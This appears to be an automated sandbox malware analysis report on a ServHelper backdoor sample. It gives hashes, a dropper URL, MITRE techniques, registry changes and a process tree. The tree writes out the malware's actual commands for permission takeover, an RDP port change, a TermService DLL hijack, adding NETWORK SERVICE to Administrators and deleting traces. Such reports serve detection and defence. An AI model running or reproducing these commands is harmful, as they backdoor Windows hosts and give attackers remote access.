servhelper | 2f279b760ab7916b996d451904e1fea41c0f01bae1c80faddf667b8a865d1a0c

Analysis

max time kernel
141s
max time network
170s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
04-01-2024 08:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4069c013a2ec0c082f78a73719dcabb7.exe
Size

5.9MB
MD5

4069c013a2ec0c082f78a73719dcabb7
SHA1

14d643ed38a6c64c299bc24379b5b66ac958aff6
SHA256

2f279b760ab7916b996d451904e1fea41c0f01bae1c80faddf667b8a865d1a0c
SHA512

5a5bdfa931a1f9a2b8855e6331669404f332f504f15a5eae7fb6e51f7ac99bbb83f5c986931fadb00c761e81617a47707cff811eb6e2ebf55369cec8f6002f05
SSDEEP

49152:pFWJLirb/TkvO90dL3BmAFd4A64nsfJ5mb5KN0ZKrVbLMe8paAzK1X4FXtPqnJ0x:pF8mmMmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	Process
84	4140	powershell.exe
90	4140	powershell.exe
93	4140	powershell.exe
96	4140	powershell.exe
104	4140	powershell.exe
118	4140	powershell.exe
120	4140	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
4668	icacls.exe
4520	icacls.exe
4260	icacls.exe
4612	takeown.exe
1968	icacls.exe
556	icacls.exe
5016	icacls.exe
3344	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid	Process
4704
4704

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid	Process
556	icacls.exe
5016	icacls.exe
3344	icacls.exe
4668	icacls.exe
4520	icacls.exe
4260	icacls.exe
4612	takeown.exe
1968	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x000200000001e7fc-101.dat	upx
behavioral2/files/0x000200000001e7ff-102.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7546.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7B15.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7B45.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7AA6.tmp	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7AD5.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_gianiaen.hlv.psm1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1hndva04.gzw.ps1	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
2464	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
3432	reg.exe

Runs net.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc	stream
HTTP User-Agent header	90	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	93	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
468	powershell.exe
468	powershell.exe
468	powershell.exe
2308	powershell.exe
2308	powershell.exe
2308	powershell.exe
2428	powershell.exe
2428	powershell.exe
4732	powershell.exe
4732	powershell.exe
468	powershell.exe
468	powershell.exe
468	powershell.exe
4140	powershell.exe
4140	powershell.exe
4140	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid	Process
676
676

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

4069c013a2ec0c082f78a73719dcabb7.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	3076	4069c013a2ec0c082f78a73719dcabb7.exe
Token: SeDebugPrivilege	468	powershell.exe
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	4732	powershell.exe
Token: SeRestorePrivilege	556	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2464	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2464	WMIC.exe
Token: SeAuditPrivilege	2464	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2464	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2464	WMIC.exe
Token: SeAuditPrivilege	2464	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1832	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1832	WMIC.exe
Token: SeAuditPrivilege	1832	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1832	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1832	WMIC.exe
Token: SeAuditPrivilege	1832	WMIC.exe
Token: SeDebugPrivilege	4140	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4069c013a2ec0c082f78a73719dcabb7.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	Process	procid_target
PID 3076 wrote to memory of 468	3076	4069c013a2ec0c082f78a73719dcabb7.exe	95
PID 3076 wrote to memory of 468	3076	4069c013a2ec0c082f78a73719dcabb7.exe	95
PID 468 wrote to memory of 1936	468	powershell.exe	97
PID 468 wrote to memory of 1936	468	powershell.exe	97
PID 1936 wrote to memory of 4748	1936	csc.exe	98
PID 1936 wrote to memory of 4748	1936	csc.exe	98
PID 468 wrote to memory of 2308	468	powershell.exe	100
PID 468 wrote to memory of 2308	468	powershell.exe	100
PID 468 wrote to memory of 2428	468	powershell.exe	102
PID 468 wrote to memory of 2428	468	powershell.exe	102
PID 468 wrote to memory of 4732	468	powershell.exe	104
PID 468 wrote to memory of 4732	468	powershell.exe	104
PID 468 wrote to memory of 4612	468	powershell.exe	114
PID 468 wrote to memory of 4612	468	powershell.exe	114
PID 468 wrote to memory of 1968	468	powershell.exe	115
PID 468 wrote to memory of 1968	468	powershell.exe	115
PID 468 wrote to memory of 556	468	powershell.exe	116
PID 468 wrote to memory of 556	468	powershell.exe	116
PID 468 wrote to memory of 5016	468	powershell.exe	117
PID 468 wrote to memory of 5016	468	powershell.exe	117
PID 468 wrote to memory of 3344	468	powershell.exe	118
PID 468 wrote to memory of 3344	468	powershell.exe	118
PID 468 wrote to memory of 4668	468	powershell.exe	119
PID 468 wrote to memory of 4668	468	powershell.exe	119
PID 468 wrote to memory of 4520	468	powershell.exe	120
PID 468 wrote to memory of 4520	468	powershell.exe	120
PID 468 wrote to memory of 4260	468	powershell.exe	121
PID 468 wrote to memory of 4260	468	powershell.exe	121
PID 468 wrote to memory of 4888	468	powershell.exe	122
PID 468 wrote to memory of 4888	468	powershell.exe	122
PID 468 wrote to memory of 3432	468	powershell.exe	123
PID 468 wrote to memory of 3432	468	powershell.exe	123
PID 468 wrote to memory of 2308	468	powershell.exe	124
PID 468 wrote to memory of 2308	468	powershell.exe	124
PID 468 wrote to memory of 1068	468	powershell.exe	125
PID 468 wrote to memory of 1068	468	powershell.exe	125
PID 1068 wrote to memory of 208	1068	net.exe	126
PID 1068 wrote to memory of 208	1068	net.exe	126
PID 468 wrote to memory of 1936	468	powershell.exe	127
PID 468 wrote to memory of 1936	468	powershell.exe	127
PID 1936 wrote to memory of 5044	1936	cmd.exe	128
PID 1936 wrote to memory of 5044	1936	cmd.exe	128
PID 5044 wrote to memory of 4692	5044	cmd.exe	129
PID 5044 wrote to memory of 4692	5044	cmd.exe	129
PID 4692 wrote to memory of 4092	4692	net.exe	130
PID 4692 wrote to memory of 4092	4692	net.exe	130
PID 468 wrote to memory of 4268	468	powershell.exe	131
PID 468 wrote to memory of 4268	468	powershell.exe	131
PID 4268 wrote to memory of 1656	4268	cmd.exe	132
PID 4268 wrote to memory of 1656	4268	cmd.exe	132
PID 1656 wrote to memory of 4340	1656	cmd.exe	133
PID 1656 wrote to memory of 4340	1656	cmd.exe	133
PID 4340 wrote to memory of 2536	4340	net.exe	134
PID 4340 wrote to memory of 2536	4340	net.exe	134
PID 2148 wrote to memory of 1216	2148	cmd.exe	138
PID 2148 wrote to memory of 1216	2148	cmd.exe	138
PID 1216 wrote to memory of 2860	1216	net.exe	139
PID 1216 wrote to memory of 2860	1216	net.exe	139
PID 4104 wrote to memory of 4048	4104	cmd.exe	142
PID 4104 wrote to memory of 4048	4104	cmd.exe	142
PID 4048 wrote to memory of 2984	4048	net.exe	143
PID 4048 wrote to memory of 2984	4048	net.exe	143
PID 656 wrote to memory of 1892	656	cmd.exe	146
PID 656 wrote to memory of 1892	656	cmd.exe	146

C:\Users\Admin\AppData\Local\Temp\4069c013a2ec0c082f78a73719dcabb7.exe
"C:\Users\Admin\AppData\Local\Temp\4069c013a2ec0c082f78a73719dcabb7.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3076
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:468
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gph34r5k\gph34r5k.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1076.tmp" "c:\Users\Admin\AppData\Local\Temp\gph34r5k\CSCEA538CFBCFDF470090806556397D245D.TMP"
      4⤵
      PID:4748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2428
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4732
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4612
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1968
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:556
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5016
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3344
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4668
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4520
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4260
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:4888
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:3432
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2308
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1068
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:208
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5044
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4692
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:4092
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4268
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1656
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4340
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:2536
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:556
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:640

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2148
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
